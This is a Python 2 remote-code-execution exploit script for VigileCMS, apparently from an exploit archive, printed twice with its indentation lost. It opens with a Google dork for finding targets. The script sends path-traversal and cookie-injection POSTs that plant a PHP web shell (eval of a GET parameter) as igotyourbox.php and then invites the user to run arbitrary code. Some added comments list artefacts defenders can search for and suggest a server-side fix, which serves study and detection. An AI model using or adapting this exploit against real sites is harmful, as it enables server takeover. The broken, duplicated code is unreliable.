Google Dork-> Powered by Cms Vigile
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
Not tested on versions earlier than 1.6.
------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
Not tested on versions earlier than 1.6.
------------------------------------------------------------------------------------------------
Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:
#Version 2 of this exploit. Not the one published on some sites.
# NOTE(review): Python 2 listing (print statements, httplib). The indentation
# of this copy was lost in extraction, so it does not parse as shown.
# Request sequence visible below: two probe GETs, two POSTs to index.php,
# one GET that checks for a dropped file, one GET that deletes a leftover
# file. All of it goes over plain HTTP to `port`.
# Artefacts a defender can search for, all taken from this listing:
#   - POSTs to index.php with pag=vedipm and inviapm=true whose `to` field or
#     rem_user cookie contains "../" sequences or "<?php";
#   - files named igotyourbox.php, or ending in .paradox-got-this-one.php,
#     under the CMS root or its db/ directory;
#   - GET requests carrying a `dox` query parameter.
import sys, httplib, urllib
# Banner and usage text; printed on every run, before the argument check.
print "\n################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
# Exits without a message when no host argument was given.
if len(sys.argv)<=1: sys.exit()
else: print "[.]Exploit Starting."
#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
db = "db" #Directory of database
target = sys.argv[1]
# The second argument is the CMS base path; it defaults to "/".
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
# Probe phase: two GETs check whether <directory><db>/index.php and
# <directory><db>/pm/index.php answer with something other than 404.
try:
#Verifing /db/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%s%s/index.php" % (directory,db))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
print "[-]%s/index.php not found (404)." % (db)
ver1 = "no"
conn.close()
#Verifing /pm/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%s%s/pm/index.php" % (directory,db))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
print"[-]%s/pm/index.php not found (404)." % (db)
ver2 = "no"
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted. Check your connection.")
# `old` selects the separators placed between index.php, pag= and inviapm=
# in the POST URLs below.
if old == 1:
pt = "/"
pt2 = "?"
else:
pt = "?"
pt2 = "&"
# A 404 on either probe adds one more ".." component to the paths sent below.
if ver1 == "no" or ver2 == "no":
transversal = ".."
print "[-]One or more Get request returned 404 error. Trying to continue with / path."
else : transversal = ""
# POST #1: the `to` form field carries "../" segments followed by PHP source
# and a .php suffix; rem_user and rem_pass are sender-chosen cookie strings.
# NOTE(review): this suggests the application builds a file path from `to`
# and trusts the rem_* cookies without validating them - presumably in its
# private-message feature; confirm against the VigileCMS source. A server-side
# fix would reject path separators and "<?" in these values and tie identity
# to a server-side session rather than to client cookies.
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../<?php eval(stripslashes($_GET[dox])); ?>.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 -->",response.status, response.reason
conn.close()
# POST #2: same endpoint. Here `to` names igotyourbox.php and the rem_user
# cookie holds the URL-encoded traversal prefix plus the PHP snippet.
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../igotyourbox.php' , 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user="+ transversal +"%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 -->",response.status, response.reason
conn.close()
# Verification: request igotyourbox.php at the location implied by
# `transversal`. Any status other than 404 is treated as success.
try:
if transversal == "..": path = "%sigotyourbox.php" % (directory)
elif transversal == "": path = "%s%s/igotyourbox.php" % (directory,db)
conn = httplib.HTTPConnection(target,port)
conn.request("GET", path)
r1 = conn.getresponse()
conn.close()
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted.")
print "[.]Verifing Exploit Success..."
if r1.status == 404:
sys.exit("[-]Exploit Failed.")
else:
print "[+]Done.\n[+]Removing the page..."
# Cleanup request: the `dox` parameter asks the dropped page to unlink the
# file named in POST #1. igotyourbox.php itself is not removed by this script,
# so it is the file an incident responder should expect to find on disk.
conn = httplib.HTTPConnection(target,port)
getrm = path + "?dox=unlink('%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E.paradox-got-this-one.php');"
conn.request("GET", getrm)
print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s \n With Content:\n <?php eval(stripslashes($_GET[dox])); ?>\n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,path)
>
'''
#Python exploit starts:
#Version 2 of this exploit. Not the one published on some sites.
# NOTE(review): this listing also appears earlier on the page with the same
# code. It is Python 2 (print statements, httplib), and its indentation was
# lost in extraction, so it does not parse as shown.
# Request sequence visible below: two probe GETs, two POSTs to index.php,
# one GET that checks for a dropped file, one GET that deletes a leftover
# file. All of it goes over plain HTTP to `port`.
# Artefacts a defender can search for, all taken from this listing:
#   - POSTs to index.php with pag=vedipm and inviapm=true whose `to` field or
#     rem_user cookie contains "../" sequences or "<?php";
#   - files named igotyourbox.php, or ending in .paradox-got-this-one.php,
#     under the CMS root or its db/ directory;
#   - GET requests carrying a `dox` query parameter.
import sys, httplib, urllib
# Banner and usage text; printed on every run, before the argument check.
print "\n################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
# Exits without a message when no host argument was given.
if len(sys.argv)<=1: sys.exit()
else: print "[.]Exploit Starting."
#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
db = "db" #Directory of database
target = sys.argv[1]
# The second argument is the CMS base path; it defaults to "/".
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
# Probe phase: two GETs check whether <directory><db>/index.php and
# <directory><db>/pm/index.php answer with something other than 404.
try:
#Verifing /db/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%s%s/index.php" % (directory,db))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
print "[-]%s/index.php not found (404)." % (db)
ver1 = "no"
conn.close()
#Verifing /pm/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%s%s/pm/index.php" % (directory,db))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
print"[-]%s/pm/index.php not found (404)." % (db)
ver2 = "no"
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted. Check your connection.")
# `old` selects the separators placed between index.php, pag= and inviapm=
# in the POST URLs below.
if old == 1:
pt = "/"
pt2 = "?"
else:
pt = "?"
pt2 = "&"
# A 404 on either probe adds one more ".." component to the paths sent below.
if ver1 == "no" or ver2 == "no":
transversal = ".."
print "[-]One or more Get request returned 404 error. Trying to continue with / path."
else : transversal = ""
# POST #1: the `to` form field carries "../" segments followed by PHP source
# and a .php suffix; rem_user and rem_pass are sender-chosen cookie strings.
# NOTE(review): this suggests the application builds a file path from `to`
# and trusts the rem_* cookies without validating them - presumably in its
# private-message feature; confirm against the VigileCMS source. A server-side
# fix would reject path separators and "<?" in these values and tie identity
# to a server-side session rather than to client cookies.
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../<?php eval(stripslashes($_GET[dox])); ?>.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 -->",response.status, response.reason
conn.close()
# POST #2: same endpoint. Here `to` names igotyourbox.php and the rem_user
# cookie holds the URL-encoded traversal prefix plus the PHP snippet.
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../igotyourbox.php' , 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user="+ transversal +"%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 -->",response.status, response.reason
conn.close()
# Verification: request igotyourbox.php at the location implied by
# `transversal`. Any status other than 404 is treated as success.
try:
if transversal == "..": path = "%sigotyourbox.php" % (directory)
elif transversal == "": path = "%s%s/igotyourbox.php" % (directory,db)
conn = httplib.HTTPConnection(target,port)
conn.request("GET", path)
r1 = conn.getresponse()
conn.close()
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted.")
print "[.]Verifing Exploit Success..."
if r1.status == 404:
sys.exit("[-]Exploit Failed.")
else:
print "[+]Done.\n[+]Removing the page..."
# Cleanup request: the `dox` parameter asks the dropped page to unlink the
# file named in POST #1. igotyourbox.php itself is not removed by this script,
# so it is the file an incident responder should expect to find on disk.
conn = httplib.HTTPConnection(target,port)
getrm = path + "?dox=unlink('%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E.paradox-got-this-one.php');"
conn.request("GET", getrm)
print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s \n With Content:\n <?php eval(stripslashes($_GET[dox])); ?>\n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,path)